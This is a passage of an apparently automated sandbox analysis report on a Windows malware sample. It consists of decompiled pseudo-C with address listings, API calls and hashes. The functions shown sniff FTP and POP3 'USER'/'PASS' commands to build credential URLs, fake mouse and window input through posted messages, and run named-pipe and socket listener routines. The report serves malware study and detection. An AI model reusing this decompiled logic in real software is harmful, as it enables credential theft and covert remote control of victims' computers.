									if(_t99 != 0) {
										_t133 = "ftp";
										goto L66;
									}
									goto L64;
								}
								_t48 = _t151 + 0x134; // 0x2563db1
								_t141 = _t129;
								_t101 = E0040F547(_t129, _t154, _t129,  *_t48);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L55;
								}
								_t49 = _t151 + 0x138; // 0x2563cc1
								_t141 = _t129;
								_t103 = E0040F547(_t129, _t154, _t129,  *_t49);
								__eflags = _t103;
								if(_t103 != 0) {
									_t51 = _t151 + 0x13c; // 0x2563d51
									_t141 = _t129;
									_t105 = E0040F547(_t129, _t154, _t129,  *_t51);
									__eflags = _t105;
									if(_t105 == 0) {
										L58:
										_v37 = 2;
										goto L59;
									}
									_t52 = _t151 + 0x140; // 0x2563d09
									_t141 = _t129;
									_t107 = E0040F547(_t129, _t154, _t129,  *_t52);
									__eflags = _t107;
									if(_t107 != 0) {
										goto L71;
									}
									goto L58;
								}
								goto L55;
							}
							_t108 =  *_t154;
							__eflags = _t108 - 0x43;
							if(_t108 == 0x43) {
								L48:
								__eflags =  *((char*)(_t154 + 1)) - 0x57;
								if( *((char*)(_t154 + 1)) != 0x57) {
									goto L71;
								}
								__eflags =  *((char*)(_t154 + 2)) - 0x44;
								if( *((char*)(_t154 + 2)) != 0x44) {
									goto L71;
								}
								_v37 = 1;
								goto L60;
							}
							__eflags = _t108 - 0x50;
							if(_t108 != 0x50) {
								goto L71;
							}
							goto L48;
						}
						__eflags =  *((char*)(_t154 + 1)) - 0x41;
						if( *((char*)(_t154 + 1)) != 0x41) {
							goto L40;
						}
						__eflags =  *((char*)(_t154 + 2)) - 0x53;
						if( *((char*)(_t154 + 2)) != 0x53) {
							goto L40;
						}
						__eflags =  *((char*)(_t154 + 3)) - 0x53;
						if( *((char*)(_t154 + 3)) != 0x53) {
							goto L40;
						}
						__eflags =  *((char*)(_t154 + 4)) - 0x20;
						if( *((char*)(_t154 + 4)) != 0x20) {
							goto L40;
						} else {
							_v28 = 5;
							L18:
							_t18 = _t149 - _v32 + 1; // 0x6
							_t74 = E0040F0A8(_t18);
							_t147 = _t74;
							_v24 = _t147;
							__eflags = _t147;
							if(_t147 == 0) {
								goto L72;
							}
							_t140 = _v32;
							__eflags = _t140;
							if(_t140 == 0) {
								_t140 = _v28;
							}
							while(1) {
								__eflags = _t140 - _t149;
								if(_t140 >= _t149) {
									break;
								}
								_t110 =  *((intOrPtr*)(_t140 + _t154));
								__eflags = _t110 - 0xa;
								if(_t110 != 0xa) {
									__eflags = _t110 - 0xd;
									if(_t110 != 0xd) {
										__eflags = _t110;
										if(_t110 != 0) {
											 *_t147 = _t110;
										}
									}
								}
								_t140 = _t140 + 1;
								_t147 = _t147 + 1;
								__eflags = _t147;
							}
							 *0x416fe8(0x417048);
							__eflags = _v36;
							if(_v36 == 0) {
								__eflags = _v32;
								if(_v32 == 0) {
									L36:
									 *0x416fec(0x417048);
									_t74 = E0040F0C0(_v32);
									goto L72;
								}
								_t157 = E0040EB48(_a4);
								__eflags = _t157;
								if(_t157 == 0) {
									goto L36;
								}
								E0040F0C0( *(_t157 + 8));
								__eflags = _a8 - _v36;
								_t117 = E0040F244(_a8 - _v36, _v32);
								 *(_t157 + 8) = _t117;
								L34:
								__eflags = _t117;
								if(_t117 == 0) {
									E0040EBDD(_t157, _t117);
								}
								goto L36;
							}
							_t157 = E0040EB48(_a4);
							__eflags = _t157;
							if(_t157 != 0) {
								L30:
								E0040EBDD(_t157, 1);
								 *_t157 = _a4;
								_t117 = E0040F244(_t131, _v32);
								 *(_t157 + 4) = _t117;
								goto L34;
							}
							_t157 = E0040EB80(_a4);
							__eflags = _t157;
							if(_t157 == 0) {
								goto L36;
							}
							goto L30;
						}
					}
					__eflags =  *((char*)(_t154 + 1)) - 0x53;
					if( *((char*)(_t154 + 1)) != 0x53) {
						goto L12;
					}
					__eflags =  *((char*)(_t154 + 2)) - 0x45;
					if( *((char*)(_t154 + 2)) != 0x45) {
						goto L12;
					}
					__eflags =  *((char*)(_t154 + 3)) - 0x52;
					if( *((char*)(_t154 + 3)) != 0x52) {
						goto L12;
					}
					__eflags =  *((char*)(_t154 + 4)) - 0x20;
					if( *((char*)(_t154 + 4)) != 0x20) {
						goto L12;
					} else {
						_v32 = 5;
						goto L18;
					}
				}
				_t74 = IsBadHugeWritePtr(__eax, _t149);
				if(_t74 != 0) {
					goto L3;
				} else {
					_t74 = E0040F173(E004101D4(0xff, _t74), _t154, _t125, _t149);
					goto L72;
				}
			}






































    0x0040ec7f
    0x0040ec92
    0x0040ec95
    0x0040ec97
    0x0040ecbd
    0x0040ecbd
    0x0040ecc0
    0x0040effc
    0x0040f002
    0x0040f002
    0x0040ecc6
    0x0040ecc8
    0x0040ecca
    0x00000000
    0x00000000
    0x0040ecd0
    0x0040ecd3
    0x00000000
    0x00000000
    0x0040ecd9
    0x0040ecdd
    0x0040ece1
    0x0040ece3
    0x0040ece5
    0x0040ed09
    0x0040ed09
    0x0040ed0b
    0x0040ee29
    0x0040ee29
    0x0040ee29
    0x0040ee2c
    0x00000000
    0x00000000
    0x0040ee1c
    0x0040ee20
    0x0040ee22
    0x0040ee28
    0x0040ee28
    0x0040ee28
    0x00000000
    0x0040ee28
    0x0040ee24
    0x0040ee26
    0x00000000
    0x00000000
    0x00000000
    0x0040ee26
    0x0040ee2e
    0x0040ee31
    0x0040ee34
    0x00000000
    0x00000000
    0x0040ee3f
    0x0040ee4d
    0x0040ee51
    0x0040ee55
    0x0040ee57
    0x0040eff1
    0x0040eff6
    0x00000000
    0x0040eff6
    0x0040ee5d
    0x0040ee60
    0x0040efe9
    0x0040efe9
    0x0040efea
    0x0040efec
    0x00000000
    0x0040efec
    0x0040ee66
    0x0040ee69
    0x00000000
    0x00000000
    0x0040ee6f
    0x0040ee72
    0x0040eea2
    0x0040eea3
    0x0040eea5
    0x00000000
    0x00000000
    0x0040eeab
    0x0040eeb1
    0x0040eeb9
    0x0040eebd
    0x0040eec2
    0x0040eec4
    0x0040eef0
    0x0040eef0
    0x0040ef2a
    0x0040ef2a
    0x0040ef2e
    0x0040ef3b
    0x0040ef43
    0x0040ef49
    0x0040ef4b
    0x0040ef7e
    0x0040ef7e
    0x0040ef83
    0x0040efde
    0x0040efde
    0x00000000
    0x0040efde
    0x0040ef85
    0x0040ef8a
    0x0040efa4
    0x0040efa5
    0x0040efab
    0x0040efb1
    0x0040efb7
    0x0040efb8
    0x0040efbd
    0x0040efc0
    0x0040efd2
    0x0040efd6
    0x00000000
    0x0040efdb
    0x0040ef51
    0x0040ef56
    0x0040ef58
    0x00000000
    0x00000000
    0x0040ef5a
    0x0040ef5f
    0x00000000
    0x00000000
    0x0040ef61
    0x0040ef67
    0x0040ef6a
    0x0040ef75
    0x0040ef7a
    0x0040ef7c
    0x0040efe2
    0x00000000
    0x0040efe2
    0x00000000
    0x0040ef7c
    0x0040eec6
    0x0040eece
    0x0040eed2
    0x0040eed7
    0x0040eed9
    0x00000000
    0x00000000
    0x0040eedb
    0x0040eee3
    0x0040eee7
    0x0040eeec
    0x0040eeee
    0x0040eef7
    0x0040eeff
    0x0040ef03
    0x0040ef08
    0x0040ef0a
    0x0040ef25
    0x0040ef25
    0x00000000
    0x0040ef25
    0x0040ef0c
    0x0040ef14
    0x0040ef18
    0x0040ef1d
    0x0040ef1f
    0x00000000
    0x00000000
    0x00000000
    0x0040ef1f
    0x00000000
    0x0040eeee
    0x0040ee74
    0x0040ee76
    0x0040ee78
    0x0040ee82
    0x0040ee82
    0x0040ee86
    0x00000000
    0x00000000
    0x0040ee8c
    0x0040ee90
    0x00000000
    0x00000000
    0x0040ee96
    0x00000000
    0x0040ee96
    0x0040ee7a
    0x0040ee7c
    0x00000000
    0x00000000
    0x00000000
    0x0040ee7c
    0x0040ed11
    0x0040ed15
    0x00000000
    0x00000000
    0x0040ed1b
    0x0040ed1f
    0x00000000
    0x00000000
    0x0040ed25
    0x0040ed29
    0x00000000
    0x00000000
    0x0040ed2f
    0x0040ed33
    0x00000000
    0x0040ed39
    0x0040ed39
    0x0040ed41
    0x0040ed47
    0x0040ed4a
    0x0040ed4f
    0x0040ed51
    0x0040ed55
    0x0040ed57
    0x00000000
    0x00000000
    0x0040ed5d
    0x0040ed61
    0x0040ed63
    0x0040ed65
    0x0040ed65
    0x0040ed7e
    0x0040ed7e
    0x0040ed80
    0x00000000
    0x00000000
    0x0040ed6b
    0x0040ed6e
    0x0040ed70
    0x0040ed72
    0x0040ed74
    0x0040ed76
    0x0040ed78
    0x0040ed7a
    0x0040ed7a
    0x0040ed78
    0x0040ed74
    0x0040ed7c
    0x0040ed7d
    0x0040ed7d
    0x0040ed7d
    0x0040ed88
    0x0040ed8e
    0x0040ed93
    0x0040edcd
    0x0040edd2
    0x0040ee07
    0x0040ee08
    0x0040ee12
    0x00000000
    0x0040ee12
    0x0040eddc
    0x0040edde
    0x0040ede0
    0x00000000
    0x00000000
    0x0040ede5
    0x0040eded
    0x0040edf5
    0x0040edfa
    0x0040edfd
    0x0040edfd
    0x0040edff
    0x0040ee02
    0x0040ee02
    0x00000000
    0x0040edff
    0x0040ed9d
    0x0040ed9f
    0x0040eda1
    0x0040edb1
    0x0040edb3
    0x0040edbf
    0x0040edc3
    0x0040edc8
    0x00000000
    0x0040edc8
    0x0040edab
    0x0040edad
    0x0040edaf
    0x00000000
    0x00000000
    0x00000000
    0x0040edaf
    0x0040ed33
    0x0040ece7
    0x0040eceb
    0x00000000
    0x00000000
    0x0040eced
    0x0040ecf1
    0x00000000
    0x00000000
    0x0040ecf3
    0x0040ecf7
    0x00000000
    0x00000000
    0x0040ecf9
    0x0040ecfd
    0x00000000
    0x0040ecff
    0x0040ecff
    0x00000000
    0x0040ecff
    0x0040ecfd
    0x0040ec9b
    0x0040eca3
    0x00000000
    0x0040eca5
    0x0040ecb3
    0x00000000
    0x0040ecb3

    APIs
    • IsBadHugeWritePtr.KERNEL32(?,?), ref: 0040EC9B
    • RtlEnterCriticalSection.NTDLL(00417048), ref: 0040ED88
    • RtlLeaveCriticalSection.NTDLL(00417048), ref: 0040EE08
    • RtlEnterCriticalSection.NTDLL(00417048), ref: 0040EE3F
    • getpeername.WS2_32(?), ref: 0040EF43
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: CriticalSection$Enter$HugeLeaveWritegetpeername
    • String ID: %S://%S:%S@%u.%u.%u.%u:%u/$ftp$pop3
    • API String ID: 133427328-3711411108
    • Opcode ID: a9aeeb0b2fe8bfdf17339fe2790413be2d391a27f1075185528f02bc31ae232d
    • Instruction ID: ae62cd487ce1acfe29c235e0b910a31a48c7da8b656b3408e107bf58a9ed15c3
    • Opcode Fuzzy Hash: a9aeeb0b2fe8bfdf17339fe2790413be2d391a27f1075185528f02bc31ae232d
    • Instruction Fuzzy Hash: 68A1E3306043566ADB319F26C844B6BBAD69F84304F048C3FF885A62D2D73CD965D79E
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00408AC4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 188windowtimeCOMMON
    Download Yara Rule
    C-Code - Quality: 98%
    			E00408AC4(void* __ecx, signed int __edx, int _a4, signed int _a8, signed short _a12) {
				char _v5;
				long _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				struct tagWINDOWINFO _v88;
				void* __ebx;
				void* __esi;
				signed short _t98;
				int _t100;
				signed int _t102;
				struct HWND__* _t142;
				signed char _t148;
				signed int _t150;
				long _t153;
				void* _t156;

				_t148 = __edx;
				_t98 = _a4;
				_t156 = __ecx;
				_t144 = _a8;
				_v24 = __edx;
				_t4 =  &_v24;
				 *_t4 = _v24 & 0x00000002;
				_v20 = __edx;
				 *(__ecx + 0x2c) = _t98;
				 *(__ecx + 0x2e) = _t144;
				if( *_t4 == 0) {
					if((__edx & 0x00000004) != 0) {
						 *(__ecx + 0x1c) =  *(__ecx + 0x1c) & 0xfffffffe;
					}
				} else {
					 *(__ecx + 0x1c) =  *(__ecx + 0x1c) | 0x00000001;
				}
				_v28 = _t148;
				_t16 =  &_v28;
				 *_t16 = _v28 & 0x00000008;
				if( *_t16 == 0) {
					if((_t148 & 0x00000010) != 0) {
						 *(_t156 + 0x1c) =  *(_t156 + 0x1c) & 0xfffffffd;
					}
				} else {
					 *(_t156 + 0x1c) =  *(_t156 + 0x1c) | 0x00000002;
				}
				_t150 = _t144 & 0x0000ffff;
				_push(_t150);
				_t100 = WindowFromPoint(_t98 & 0x0000ffff);
				_t142 = _t100;
				if(_t142 == 0) {
					L36:
					return _t100;
				} else {
					_v88.cbSize = 0x3c;
					_t100 = GetWindowInfo(_t142,  &_v88);
					if(_t100 == 0) {
						goto L36;
					}
					_t102 = _a4 & 0x0000ffff;
					if(_t102 < _v88.rcClient || _t102 > _v60 || _t150 < _v64) {
						L14:
						_v5 = 0;
						goto L15;
					} else {
						_v5 = 1;
						if(_t150 <= _v56) {
							L15:
							_t153 = _t150 << 0x00000010 | _t102;
							_v12 = _t153;
							if(SendMessageTimeoutW(_t142, 0x84, 0, _t153, 3, 0x12c,  &_v16) == 0) {
								_v16 = 0;
							}
							if(_v16 >= 0x64) {
								_v16 = 0;
							} else {
								_v16 = _v16 & 0x0000ffff;
							}
							if(_v5 == 0) {
								_t100 = _v16 & 0x0000ffff;
							} else {
								_t144 = _a4 - _v88.rcClient & 0x0000ffff;
								_v12 = (_a8 - _v64 & 0x0000ffff) << 0x00000010 | _a4 - _v88.rcClient & 0x0000ffff;
								_t100 =  *(_t156 + 0x1c);
							}
							_a4 = _t100;
							if((_v20 & 0x00000001) != 0) {
								E00408A4F(_t142, _v88.dwStyle, _v16, 0x200);
								_t100 = PostMessageW(_t142, ((0 | _v5 == 0x00000000) - 0x00000001 & 0x00000160) + 0xa0, _a4, _v12);
							}
							if(_v24 == 0) {
								if((_v20 & 0x00000004) != 0) {
									_t100 = PostMessageW(_t142, ((0 | _v5 == 0x00000000) - 0x00000001 & 0x00000160) + 0xa2, _a4, _v12);
								}
							} else {
								E00408A4F(_t142, _v88.dwStyle, _v16, 0x201);
								_t100 = E0040899F(((0 | _v5 == 0x00000000) - 0x00000001 & 0x00000160) + 0xa1, _t142, _t144, _t156, _a4, _v12);
							}
							if(_v28 == 0) {
								if((_v20 & 0x00000010) != 0) {
									_t100 = PostMessageW(_t142, ((0 | _v5 == 0x00000000) - 0x00000001 & 0x00000160) + 0xa5, _a4, _v12);
								}
							} else {
								E00408A4F(_t142, _v88.dwStyle, _v16, 0x204);
								_t100 = E0040899F(((0 | _v5 == 0x00000000) - 0x00000001 & 0x00000160) + 0xa4, _t142, _t144, _t156, _a4, _v12);
							}
							if((_v20 & 0x00000800) != 0 && _v5 != 0) {
								_t100 = PostMessageW(_t142, 0x20a, (_a12 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff, _v12);
							}
							goto L36;
						}
						goto L14;
					}
				}
			}























    0x00408ac4
    0x00408aca
    0x00408acf
    0x00408ad1
    0x00408ad4
    0x00408ad7
    0x00408ad7
    0x00408adc
    0x00408adf
    0x00408ae3
    0x00408ae7
    0x00408af2
    0x00408af4
    0x00408af4
    0x00408ae9
    0x00408ae9
    0x00408ae9
    0x00408af8
    0x00408afb
    0x00408afb
    0x00408aff
    0x00408b0a
    0x00408b0c
    0x00408b0c
    0x00408b01
    0x00408b01
    0x00408b01
    0x00408b10
    0x00408b16
    0x00408b18
    0x00408b1e
    0x00408b22
    0x00408ce0
    0x00408ce4
    0x00408b28
    0x00408b2d
    0x00408b34
    0x00408b3c
    0x00000000
    0x00000000
    0x00408b42
    0x00408b49
    0x00408b5e
    0x00408b5e
    0x00000000
    0x00408b55
    0x00408b58
    0x00408b5c
    0x00408b62
    0x00408b65
    0x00408b73
    0x00408b87
    0x00408b89
    0x00408b89
    0x00408b90
    0x00408b9b
    0x00408b92
    0x00408b96
    0x00408b96
    0x00408ba2
    0x00408bc3
    0x00408ba4
    0x00408bb3
    0x00408bbb
    0x00408bbe
    0x00408bbe
    0x00408bcb
    0x00408bd3
    0x00408be1
    0x00408bfe
    0x00408bfe
    0x00408c08
    0x00408c3c
    0x00408c56
    0x00408c56
    0x00408c0a
    0x00408c16
    0x00408c31
    0x00408c31
    0x00408c60
    0x00408c94
    0x00408cae
    0x00408cae
    0x00408c62
    0x00408c6e
    0x00408c89
    0x00408c89
    0x00408cbb
    0x00408cda
    0x00408cda
    0x00000000
    0x00408cbb
    0x00000000
    0x00408b5c
    0x00408b49

    APIs
    • WindowFromPoint.USER32(?), ref: 00408B18
    • GetWindowInfo.USER32(00000000,?), ref: 00408B34
    • SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000003,0000012C,?), ref: 00408B7F
    • PostMessageW.USER32(00000000,-000000A1,?,?), ref: 00408BFE
    • PostMessageW.USER32(00000000,-000000A3,?,?), ref: 00408C56
    • PostMessageW.USER32(00000000,-000000A6,?,?), ref: 00408CAE
    • PostMessageW.USER32(00000000,0000020A,00000800,?), ref: 00408CDA
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Message$Post$Window$FromInfoPointSendTimeout
    • String ID: <$d
    • API String ID: 32776474-1762099457
    • Opcode ID: 350ce41066c8c6c7661e5dc62eb0dbbba3a20d5c42b7dcbe1faf44b8c56fee3b
    • Instruction ID: 9dc3d389dc38a2338eba9d7f85b420450b9f46f2af1fab54682631787e76ed4b
    • Opcode Fuzzy Hash: 350ce41066c8c6c7661e5dc62eb0dbbba3a20d5c42b7dcbe1faf44b8c56fee3b
    • Instruction Fuzzy Hash: 33619EB1A04208BEEF158FA4CE45BAEBBB4EF44344F04846EF991F5191CB7C9684DB64
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040B37A, Relevance: 15.1, APIs: 10, Instructions: 139filepipeCOMMON
    Download Yara Rule
    C-Code - Quality: 88%
    			E0040B37A(void* __eflags, long _a4, void _a8, void** _a12, long* _a16, void _a20, void _a24) {
				char _v5;
				void _v12;
				short _v532;
				long* _t67;
				void** _t69;
				long _t70;
				void* _t71;
				long _t73;
				void* _t74;

				_v12 = _v12 | 0xffffffff;
				_v5 = 1;
				E0040B088( &_v532, _a4);
				while(1) {
					_t71 = CreateFileW( &_v532, 0xc0000000, 3, 0, 3, 0, 0);
					if(_t71 != 0xffffffff) {
						break;
					}
					if(_v5 != 0) {
						WaitNamedPipeW( &_v532, 0xffffffff);
						_v5 = 0;
						continue;
					}
					L23:
					return _v12;
				}
				_a4 = 2;
				if(SetNamedPipeHandleState(_t71,  &_a4, 0, 0) != 0) {
					_push(0);
					_push( &_a4);
					_t73 = 4;
					if(WriteFile(_t71,  &_a8, _t73, ??, ??) != 0 && WriteFile(_t71,  &_a24, _t73,  &_a4, 0) != 0 && WriteFile(_t71, _a20, _a24,  &_a4, 0) != 0 && ReadFile(_t71,  &_v12, _t73,  &_a4, 0) != 0 && _a4 == _t73) {
						_a20 = 0;
						if(ReadFile(_t71,  &_a20, _t73,  &_a4, 0) == 0 || _a4 != _t73) {
							_v12 = _v12 | 0xffffffff;
						} else {
							_t62 = _a20;
							if(_a20 > 0) {
								_t74 = E0040F0A8(_t62);
								if(_t74 == 0 || ReadFile(_t71, _t74, _a20,  &_a4, 0) == 0) {
									L19:
									_v12 = _v12 | 0xffffffff;
									goto L20;
								} else {
									_t70 = _a20;
									if(_t70 != _a4) {
										goto L19;
									} else {
										_t69 = _a12;
										if(_t69 == 0) {
											L20:
											E0040F0C0(_t74);
										} else {
											_t67 = _a16;
											if(_t67 == 0) {
												goto L20;
											} else {
												 *_t69 = _t74;
												 *_t67 = _t70;
											}
										}
									}
								}
							}
						}
					}
				}
				CloseHandle(_t71);
				goto L23;
			}












    0x0040b383
    0x0040b393
    0x0040b397
    0x0040b3c0
    0x0040b3d5
    0x0040b3da
    0x00000000
    0x00000000
    0x0040b3a8
    0x0040b3b7
    0x0040b3bd
    0x00000000
    0x0040b3bd
    0x0040b4d7
    0x0040b4de
    0x0040b4de
    0x0040b3e3
    0x0040b3f2
    0x0040b3f8
    0x0040b3fc
    0x0040b3ff
    0x0040b40e
    0x0040b46c
    0x0040b477
    0x0040b4cc
    0x0040b47e
    0x0040b47e
    0x0040b483
    0x0040b48a
    0x0040b48e
    0x0040b4c0
    0x0040b4c0
    0x00000000
    0x0040b4a4
    0x0040b4a4
    0x0040b4aa
    0x00000000
    0x0040b4ac
    0x0040b4ac
    0x0040b4b1
    0x0040b4c4
    0x0040b4c5
    0x0040b4b3
    0x0040b4b3
    0x0040b4b8
    0x00000000
    0x0040b4ba
    0x0040b4ba
    0x0040b4bc
    0x0040b4bc
    0x0040b4b8
    0x0040b4b1
    0x0040b4aa
    0x0040b48e
    0x0040b483
    0x0040b477
    0x0040b40e
    0x0040b4d1
    0x00000000

    APIs
      • Part of subcall function 0040B088: lstrcpyW.KERNEL32(?,\\.\pipe\), ref: 0040B091
      • Part of subcall function 0040B088: lstrcpyW.KERNEL32(?,?), ref: 0040B09F
    • WaitNamedPipeW.KERNEL32(?,000000FF,?,?,00000000), ref: 0040B3B7
    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,000000FF,?,?,00000000), ref: 0040B3CF
    • SetNamedPipeHandleState.KERNEL32(00000000,000000FF,00000000,00000000,?,?,00000000), ref: 0040B3EA
    • WriteFile.KERNEL32(00000000,025DF908,00000004,00000002,00000000,?,?,00000000), ref: 0040B406
    • WriteFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B41F
    • WriteFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040B439
    • ReadFile.KERNEL32(00000000,00000002,00000004,00000002,00000000,?,?,00000000), ref: 0040B452
    • ReadFile.KERNEL32(00000000,00000000,00000004,00000002,00000000,?,?,00000000), ref: 0040B46F
    • ReadFile.KERNEL32(00000000,00000000,00000000,00000002,00000000,?,?,00000000), ref: 0040B49A
      • Part of subcall function 0040F0C0: HeapFree.KERNEL32(00000000,00000000,0040B690,00000000,00000001), ref: 0040F0D3
    • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040B4D1
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: File$ReadWrite$HandleNamedPipelstrcpy$CloseCreateFreeHeapStateWait
    • String ID:
    • API String ID: 34731080-0
    • Opcode ID: df10f63ff758778fc1cd22f1a60b785de0c2751dd7d6661d3e87381623be594a
    • Instruction ID: 69d50d1413e1f68ad742445ef4237e4b003dba269eebb95cf82bf24da3f336fb
    • Opcode Fuzzy Hash: df10f63ff758778fc1cd22f1a60b785de0c2751dd7d6661d3e87381623be594a
    • Instruction Fuzzy Hash: 3A412672100109BBDB219FA4DC88AEF3A6CEB05754F10817AF915E22D1D734DA85CBA8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00408FB6, Relevance: 15.1, APIs: 10, Instructions: 139synchronizationnetworkCOMMON
    Download Yara Rule
    C-Code - Quality: 92%
    			E00408FB6(void* __ebx, void* __ecx, long _a4) {
				intOrPtr _v8;
				char _v12;
				HANDLE* _v16;
				long _v20;
				void* _v24;
				long _v32;
				void* __edi;
				void* __esi;
				void* _t38;
				long _t42;
				intOrPtr _t49;
				long _t57;
				void* _t58;
				void* _t73;
				void* _t75;
				void* _t78;
				long _t79;

				_t73 = __ecx;
				_v12 = _a4;
				_t79 = 0;
				E0040F173( &_v32,  &_v32, 0, 0xc);
				_t38 = CreateEventW(0, 1, 0, 0);
				_v24 = _t38;
				if(_t38 == 0) {
					L26:
					 *0x416a88 =  *0x416a88 - 1;
					return 0;
				}
				_a4 = 0;
				E0040F173( &_v20,  &_v20, 0, 8);
				_t42 = WaitForSingleObject( *0x416a8c, 0);
				_t75 = 0x102;
				if(_t42 != 0x102) {
					L25:
					SetEvent(_v24);
					WaitForMultipleObjects(_v20, _v16, 1, 0xffffffff);
					E004121D7( &_v20);
					CloseHandle(_v24);
					goto L26;
				}
				_push(__ebx);
				do {
					_t49 = E004108D1( &_v12, 0x3e8, _t79);
					_v8 = _t49;
					if(_t49 != 0xffffffff) {
						if(_v32 == _t79 || _v32 == 0xffffffff || _a4 == _t79 || WaitForSingleObject(_a4, _t79) != _t75) {
							E00412115(_t73,  &_v20);
							_v32 = _t79;
							if(E00412183( &_v20,  &_a4, E00408E1C,  &_v32) != 0) {
								while(_v32 == _t79) {
									if(WaitForSingleObject( *0x416a8c, 0xc8) != 0x102) {
										E004108F5(_v8);
										L24:
										goto L25;
									}
								}
								if(_v32 == 0xffffffff) {
									WaitForSingleObject(_a4, 0xffffffff);
									_a4 = _t79;
									_v32 = _t79;
								}
								goto L16;
							}
							_a4 = _t79;
						} else {
							L16:
							if(_a4 == _t79) {
								L20:
								E004108F5(_v8);
								_t79 = 0;
								goto L21;
							}
							_t58 = 0x30;
							_t78 = E0040F0A8(_t58);
							if(_t78 == _t79) {
								goto L20;
							}
							E0040F0FC(_t78,  &_v32, 0xc);
							 *((intOrPtr*)(_t78 + 0xc)) = _v8;
							if(E00412183( &_v20, 0, E00408CEA, _t78) != 0) {
								goto L21;
							}
							E0040F0C0(_t78);
						}
						goto L20;
					}
					if( *0x416de4() != 0x274c) {
						goto L24;
					}
					L21:
					_t57 = WaitForSingleObject( *0x416a8c, _t79);
					_t75 = 0x102;
				} while (_t57 == 0x102);
				goto L24;
			}




















    0x00408fb6
    0x00408fc2
    0x00408fc5
    0x00408fcc
    0x00408fd6
    0x00408fdc
    0x00408fe1
    0x00409157
    0x00409157
    0x00409161
    0x00409161
    0x00408fef
    0x00408ff2
    0x00408ffe
    0x00409004
    0x0040900b
    0x0040912c
    0x0040912f
    0x0040913f
    0x00409148
    0x00409150
    0x00000000
    0x00409156
    0x00409011
    0x00409012
    0x0040901e
    0x00409023
    0x00409029
    0x00409044
    0x00409062
    0x00409075
    0x0040907f
    0x004090a2
    0x0040909c
    0x00409126
    0x0040912b
    0x00000000
    0x0040912b
    0x0040909c
    0x004090ab
    0x004090b2
    0x004090b8
    0x004090bb
    0x004090bb
    0x00000000
    0x004090ab
    0x00409081
    0x004090be
    0x004090be
    0x004090c1
    0x004090fd
    0x00409100
    0x00409105
    0x00000000
    0x00409105
    0x004090c5
    0x004090cb
    0x004090cf
    0x00000000
    0x00000000
    0x004090d8
    0x004090e1
    0x004090f5
    0x00000000
    0x00000000
    0x004090f8
    0x004090f8
    0x00000000
    0x00409044
    0x00409036
    0x00000000
    0x00000000
    0x00409107
    0x0040910e
    0x00409114
    0x00409119
    0x00000000

    APIs
    • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,0000000C), ref: 00408FD6
    • WaitForSingleObject.KERNEL32(00000000,?,00000000,00000008), ref: 00408FFE
    • WSAGetLastError.WS2_32(?,000003E8,00000000), ref: 0040902B
      • Part of subcall function 004108F5: shutdown.WS2_32(?,00000002), ref: 004108FD
      • Part of subcall function 004108F5: closesocket.WS2_32(?), ref: 00410904
    • WaitForSingleObject.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00409055
    • WaitForSingleObject.KERNEL32(00000000), ref: 0040910E
    • SetEvent.KERNEL32(?), ref: 0040912F
    • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 0040913F
    • CloseHandle.KERNEL32(?), ref: 00409150
      • Part of subcall function 004108D1: accept.WS2_32(00000000,00000000,00000000), ref: 004108EC
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Wait$ObjectSingle$Event$CloseCreateErrorHandleLastMultipleObjectsacceptclosesocketshutdown
    • String ID:
    • API String ID: 799176206-0
    • Opcode ID: 37ab4d9d2457a534f7b3d6d72b978a92b70925a05b9f64cd2dcf2ab1a869ef2d
    • Instruction ID: 077cfeadb46ef16016e41251fab32098660b998428664a0d07c2bd5fac369b9f
    • Opcode Fuzzy Hash: 37ab4d9d2457a534f7b3d6d72b978a92b70925a05b9f64cd2dcf2ab1a869ef2d
    • Instruction Fuzzy Hash: ED416A31900119EBDF21AF61DC499EFBB79EF05760F118136F514B61E2C7788E828B98
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040C290, Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 277networkCOMMON
    Download Yara Rule
    C-Code - Quality: 80%
    			E0040C290(char __edx, char* __esi, intOrPtr _a4, char _a8) {
				long _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				char _v60;
				char* _v64;
				void _v72;
				void* _v80;
				char _v348;
				void _v1372;
				void* __ebx;
				signed int _t94;
				void* _t111;
				intOrPtr _t121;
				int _t131;
				short _t132;
				signed int _t133;
				long _t138;
				long _t140;
				char _t141;
				char _t142;
				signed int _t143;
				intOrPtr _t144;
				intOrPtr _t145;
				char* _t148;
				intOrPtr _t153;
				void* _t154;
				intOrPtr* _t156;
				char* _t158;
				void* _t159;

				_t158 = __esi;
				_t151 = __edx;
				_v12 = _v12 | 0xffffffff;
				_t162 = __esi[0x414];
				if(__esi[0x414] == 0) {
					L27:
					_t82 = _t158[0x42c];
					if(_t82 > 0x96000) {
						L66:
						return 1;
					}
					if(_v12 != 0xffff) {
						L35:
						_t84 = _t158[0x42c];
						_t138 = 0;
						if(_t158[0x42c] <= 0) {
							L45:
							_v16 = 0;
							_v12 = 0;
							_t153 = 0xc;
							if(_t158[4] != 0x73 || _t158[5] != 0x3a) {
